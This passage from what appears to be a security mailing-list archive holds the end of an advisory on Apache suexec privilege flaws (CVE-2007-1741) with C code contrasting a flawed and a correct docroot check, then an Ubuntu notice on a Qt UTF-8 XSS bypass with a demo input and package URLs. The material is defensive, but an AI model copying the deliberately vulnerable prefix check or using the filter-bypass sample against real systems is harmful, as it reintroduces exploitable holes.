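 * "/var/www/htmleditor" share the docroot's leading bytes and are accepted. */
bool under_docroot_prefix_only(const char *docroot, const char *dir)
{
    return strncmp(docroot, dir, strlen(docroot)) == 0;
}

/* The correct test: the bytes must match AND the next character of `dir`
 * must be a directory separator or the terminating NUL, so only the root
 * itself or something beneath it passes. Trailing slashes on docroot are
 * ignored; a docroot of "/" contains every absolute path. */
bool under_docroot(const char *docroot, const char *dir)
{
    size_t n = strlen(docroot);
    while (n > 1 && docroot[n - 1] == '/')
        n--;
    if (n == 1 && docroot[0] == '/')
        return dir[0] == '/';
    if (strncmp(docroot, dir, n) != 0)
        return false;
    return dir[n] == '\0' || dir[n] == '/';
}

/* The missing file-type check, done on an open descriptor rather than on a
 * path: O_NOFOLLOW refuses a symlink at the final component, and fstat()
 * inspects the very object that was opened, so a rename or link swap after
 * the check cannot change what was checked. Returns the descriptor for the
 * caller to use, or -1 if the target is not a regular file. */
int open_regular_target(const char *path)
{
    int fd = open(path, O_RDONLY | O_NOFOLLOW);
    if (fd < 0)
        return -1;
    struct stat st;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode)) {
        close(fd);
        return -1;
    }
    return fd;
}

int main(void)
{
    const char *root = "/var/www/html";
    const char *samples[] = { "/var/www/html", "/var/www/html/cgi-bin",
                              "/var/www/html_backup", "/var/www/htmleditor" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-24s prefix-only=%d correct=%d\n", samples[i],
               under_docroot_prefix_only(root, samples[i]),
               under_docroot(root, samples[i]));
    int fd = open_regular_target(".");   /* a directory: must be refused */
    printf("open_regular_target(\".\") = %d\n", fd);
    if (fd >= 0)
        close(fd);
    return 0;
}
```

The descriptor-based check closes the window between the symbolic link test and execution only if the same descriptor is what gets executed afterwards; re-opening by path would reintroduce the race.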

3) Arbitrary Group Id Input Validation Vulnerability

Due to a design error, the suexec binary permits any combination of
user/group values taken from command line parameters even if the user
is not a member of the specified group. This may be exploited in
combination with other vulnerabilities if the /proc file system is
mounted. Each time suexec drops its privileges and changes its UID and
GID, all files and directories under /proc/{PID} change their owner to
the corresponding values. As the suexec process changes its UID and GID
unconditionally, creating arbitrary UID and GID owned files is trivial.

III. ANALYSIS

Exploitation of these vulnerabilities would allow a local attacker to
execute arbitrary code with the privileges of another user.

In order to exploit this vulnerability, the user must already have
access to execute the suexec binary. The suexec binary is only able to
be executed by the same user as the web server, typically user 'httpd',
'apache' or 'nobody'. It may be possible to gain access to this user by
exploiting a CGI program, PHP script or other program on the server.

The binary also limits the users it will execute code as to those which
have user and group IDs greater than or equal to AP_UID_MIN and
AP_GID_MIN values respectively. These values are compiled into the
executable.

These factors somewhat mitigate the severity of the problem.

IV. DETECTION

iDefense has confirmed the existence of these vulnerabilities in the
suexec binary distributed with version 2.2.3 of Apache httpd in
Red Hat Inc.'s Fedora Core 4. This distribution is not vulnerable in the
default configuration, as exploitation requires additional, but common,
configuration changes to be made to the system.

It is suspected that all previous versions of suexec are vulnerable,
including the 1.3.x versions.

V. WORKAROUND

If the suexec binary is not required for normal operation, remove the
set-uid bit from the file as shown below.

  # chmod -s /path/to/suexec

VI. VENDOR RESPONSE

The Apache Software Foundation HTTPD team declined to address the
vulnerabilities and instead provided the following vendor statement.

The attacks described rely on an insecure server configuration - that
the unprivileged user the server runs as has write access to the
document root. The suexec tool cannot detect all possible insecure
configurations, nor can it protect against privilege escalation in
all such cases.

It is important to note that to be able to invoke suexec, the attacker
must also first gain the ability to execute arbitrary code as the
unprivileged server user.

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2007-1741 to this issue. This is a candidate for 

[Full-disclosure] [USN-452-1] KDE library vulnerability

2007-04-11 Thread Kees Cook
=== 
Ubuntu Security Notice USN-452-1 April 11, 2007
kdelibs, qt-x11-free vulnerability
CVE-2007-0242
===

A security issue affects the following Ubuntu releases:

Ubuntu 5.10
Ubuntu 6.06 LTS
Ubuntu 6.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 5.10:
  kdelibs4c2   4:3.4.3-0ubuntu2.4
  libqt3-mt3:3.3.4-8ubuntu5.2

Ubuntu 6.06 LTS:
  kdelibs4c2a  4:3.5.2-0ubuntu18.4
  libqt3-mt3:3.3.6-1ubuntu6.2

Ubuntu 6.10:
  kdelibs4c2a  4:3.5.5-0ubuntu3.4
  libqt3-mt3:3.3.6-3ubuntu3.1

After a standard system upgrade you need to restart your session or 
reboot your computer to effect the necessary changes.

Details follow:

The Qt library did not correctly handle truncated UTF8 strings, which 
could cause some applications to incorrectly filter malicious strings.  
If a Konqueror user were tricked into visiting a web site containing 
specially crafted strings, normal XSS prevention could be bypassed 
allowing a remote attacker to steal confidential data.
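The failure class behind this notice, as an added C example that is not Qt or KDE code: a filter that runs on a decoded string can miss a character that a lenient UTF-8 decoder swallowed into a truncated multibyte sequence. The `lenient_contains_lt()` scanner is an illustrative model of that behaviour, not a reproduction of Qt's decoder; `utf8_is_well_formed()` and `strict_flags_input()` are names made up for the example, and the sample inputs are constructed.

```c
/* Added example, not Qt code: validate UTF-8 strictly before running any
 * character filter on it. The "lenient" scanner is a model of the failure
 * class the notice describes, not a reproduction of Qt's decoder. */
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Continuation bytes a lead byte announces, or -1 for a byte that cannot
 * start a sequence (stray continuation bytes 0x80-0xBF, 0xC0/0xC1, 0xF5+). */
static int utf8_expected_tail(unsigned char b)
{
    if (b < 0x80) return 0;
    if (b >= 0xC2 && b <= 0xDF) return 1;
    if (b >= 0xE0 && b <= 0xEF) return 2;
    if (b >= 0xF0 && b <= 0xF4) return 3;
    return -1;
}

/* Strict well-formedness: each lead byte must be followed by exactly the
 * announced number of continuation bytes (10xxxxxx). A sequence cut off by
 * the end of the buffer, or by an ASCII byte such as '<', is rejected.
 * (Overlong and surrogate encodings are not checked here, for brevity.) */
bool utf8_is_well_formed(const unsigned char *s, size_t len)
{
    size_t i = 0;
    while (i < len) {
        int tail = utf8_expected_tail(s[i]);
        if (tail < 0)
            return false;
        if ((size_t)tail > len - 1 - i)          /* truncated by end of input */
            return false;
        for (int k = 1; k <= tail; k++)
            if ((s[i + k] & 0xC0) != 0x80)       /* truncated by a non-continuation byte */
                return false;
        i += 1 + (size_t)tail;
    }
    return true;
}

/* Lenient scanner: trusts the lead byte and skips the announced tail without
 * checking it, so a lone 0xE2 followed by "<script>" hides the '<'. */
bool lenient_contains_lt(const unsigned char *s, size_t len)
{
    size_t i = 0;
    while (i < len) {
        if (s[i] == '<')
            return true;
        int tail = utf8_expected_tail(s[i]);
        i += 1 + (size_t)(tail < 0 ? 0 : tail);
    }
    return false;
}

/* Defensive filter: malformed input is treated as unsafe outright; only a
 * well-formed string is scanned, and a byte-wise scan is then exact because
 * 0x3C ('<') can never occur inside a multibyte sequence. Returns true when
 * the input must be rejected or escaped. */
bool strict_flags_input(const unsigned char *s, size_t len)
{
    if (!utf8_is_well_formed(s, len))
        return true;
    return memchr(s, '<', len) != NULL;
}

int main(void)
{
    /* Constructed inputs: a valid accented word, and a truncated lead byte
     * immediately followed by a tag. */
    const unsigned char ok[] = "caf\xC3\xA9";
    const unsigned char bad[] = "\xE2<script>";
    printf("well-formed: ok=%d bad=%d\n",
           utf8_is_well_formed(ok, 5), utf8_is_well_formed(bad, 9));
    printf("lenient scanner sees '<' in bad: %d\n", lenient_contains_lt(bad, 9));
    printf("strict filter flags bad: %d\n", strict_flags_input(bad, 9));
    return 0;
}
```

The general rule this illustrates is to validate the encoding first and to apply the security filter on the same representation the consumer will use; a filter and a decoder that disagree about where a character ends give an attacker the gap between them.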


Updated packages for Ubuntu 5.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs_3.4.3-0ubuntu2.4.diff.gz
  Size/MD5:   331260 14f4a843208f2b72170515c1c06228a4

http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs_3.4.3-0ubuntu2.4.dsc
  Size/MD5: 1523 62ab5c94f93587394acf16024009dd02

http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs_3.4.3.orig.tar.gz
  Size/MD5: 19981388 36e7a8320bd95760b41c4849da170100

http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/qt-x11-free_3.3.4-8ubuntu5.2.diff.gz
  Size/MD5:79606 def97d0dfafb379accc7a1af41f17e85

http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/qt-x11-free_3.3.4-8ubuntu5.2.dsc
  Size/MD5: 1791 79af506f9535905e028c8e797235019f

http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/qt-x11-free_3.3.4.orig.tar.gz
  Size/MD5: 17422638 9b327962af5a1799fd31b7a576948ad5

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs-data_3.4.3-0ubuntu2.4_all.deb
  Size/MD5:  6970748 978f6f52b6fc59a493dc2d1e847c08cf

http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs4-doc_3.4.3-0ubuntu2.4_all.deb
  Size/MD5: 29297130 f0c9cb85541c275bd12f51ea86bef457

http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs_3.4.3-0ubuntu2.4_all.deb
  Size/MD5:30864 5c9cbfe2f9729fd6e8304054f05c4825

http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/libqt3-i18n_3.3.4-8ubuntu5.2_all.deb
  Size/MD5:96662 dd2441f97ca62d5b20ec44f2cb426d12

http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/qt3-doc_3.3.4-8ubuntu5.2_all.deb
  Size/MD5:  5425778 4e1dabf0463b01a7b62c838d486eb6ae

http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/qt3-examples_3.3.4-8ubuntu5.2_all.deb
  Size/MD5:  1557390 0084af561924421a40162681037475d7

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs-bin_3.4.3-0ubuntu2.4_amd64.deb
  Size/MD5:   926822 56c338f6cfbf1573ce8c8bb7f8d1ca18

http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs4-dev_3.4.3-0ubuntu2.4_amd64.deb
  Size/MD5:  1309200 b3cf96e472204472b880b35938a30cc9

http://security.ubuntu.com/ubuntu/pool/universe/k/kdelibs/kdelibs4c2-dbg_3.4.3-0ubuntu2.4_amd64.deb
  Size/MD5: 22556454 94d9327a94eb8fb02c92b734aa6841ac

http://security.ubuntu.com/ubuntu/pool/main/k/kdelibs/kdelibs4c2_3.4.3-0ubuntu2.4_amd64.deb
  Size/MD5:  9109406 612b6703542a17bb5b00251bebc5d2a0

http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/libqt3-compat-headers_3.3.4-8ubuntu5.2_amd64.deb
  Size/MD5:82664 429f9e651bae85b13a5abae05902b0ac

http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/libqt3-headers_3.3.4-8ubuntu5.2_amd64.deb
  Size/MD5:   354928 03922254eb6924bd67952f0e14f8f34d

http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/libqt3-mt-dbg_3.3.4-8ubuntu5.2_amd64.deb
  Size/MD5: 17426488 2ce5310a6ba010544a9b813b78dee1ec

http://security.ubuntu.com/ubuntu/pool/main/q/qt-x11-free/libqt3-mt-dev_3.3.4-8ubuntu5.2_amd64.deb
  Size/MD5:51442 626662816df2adc35559f4308f921e6e

http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/libqt3-mt-mysql_3.3.4-8ubuntu5.2_amd64.deb
  Size/MD5:56118 bb231492bf303b1c18e340f185b2f136

http://security.ubuntu.com/ubuntu/pool/universe/q/qt-x11-free/libqt3-mt-odbc_3.3.4-8ubuntu5.2_amd64.deb
  Size/MD5:78240